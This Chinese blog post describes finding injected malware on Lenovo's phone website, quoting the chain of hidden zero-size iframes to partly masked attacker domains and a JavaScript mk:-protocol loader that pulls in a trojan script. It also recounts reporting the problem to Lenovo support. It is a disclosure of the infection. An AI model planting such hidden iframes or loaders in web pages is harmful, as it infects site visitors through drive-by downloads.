无意间进了联想手机的网站。

我的防火墙竟然报警,发现木马病毒[Exploit.HTML.Mht]。

打开源代码,发现被嵌入如下代码(为免害人,以下部份代码用××代替):

<iframe width=0 height=0 frameborder=0 scrolling=no src="_ttp://www.hero××.com"></iframe>

打开这个:\_ttp://www.hero××.com网站,发现又藏着一段代码:

<iframe width=0 height=0 frameborder=0 scrolling=no src="_ttp://www.××2006.com/q15/index.htm"></iframe>

打开:\_ttp://www.××2006.com/q15/index.htm,包含着代码:

<script language="javascript" src="ah.js"></script>

代码内容如下:

\==============

GIF89a var GIF89a=document.location.href;GIF89a=GIF89a.substring(0,GIF89a.lastIndexOf('/'));document.write('<OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:××××××××××'+GIF89a+'%2f1.js::/%23"></OBJECT>');

\=================

-----------------------------

经过七弯八拐,终于看到木马文件。1.js。

-----------------------------

想来真是笑人,堂堂联想集团都会被人搞上一手,成了病毒传播基地。闲着无事就想多多事,想着给联想发个邮件提醒一下。找了半天竟然不知道发到哪个邮箱。

于是拨打联想的免费800电话:800-810-8888,听了一大段音乐,进入意见建议,接线员37号。

在大费了一番唇舌后,告诉他联想手机的网站上有病毒代码。他登陆后说没有发现,问我什么症状,能有什么症状,被我防火墙杀了。他在上面转悠了半天,说没有什么发现,问我是不是我自己机子中病毒了,而不是网站的原因,让我检查下自己的机子。

长叹一声:I服了U,算老。挂了电话还要我评分,本想给个差,想想还是给个一般吧。

网站当摆设也就罢了,还当了毒源,难怪当年FM365不见,也真不是怪事了。

提示:IE没打补丁,没开防火墙就不要上联想手机的网站。免得中招。

-------Update:-----------------

联想手机已经修改了网站,去掉了相关代码。

并给我回复了邮件:

尊敬的用户:

非常感谢您对联想公司的关爱和支持!

您反映的问题我们会转达到相关部门核实改进。也非常感谢您对联想公司的关爱和支持!联想公司将在您的支持下不断进步,为用户提供更优质的产品和服务。

诚挚的,LENOVO.COM

lenovo.gif

标签: 木马

评论已关闭